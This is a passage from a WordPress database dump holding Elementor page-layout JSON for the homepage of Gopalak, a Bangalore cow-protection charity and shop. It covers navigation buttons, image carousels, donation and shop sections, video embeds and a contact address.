us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11660,1934,'_elementor_page_assets','a:0:{}'),(11662,1935,'_elementor_edit_mode','builder'),(11663,1935,'_elementor_template_type','wp-page'),(11664,1935,'_elementor_version','3.7.8'),(11665,1935,'_wp_page_template','elementor_canvas'),(11666,1935,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s 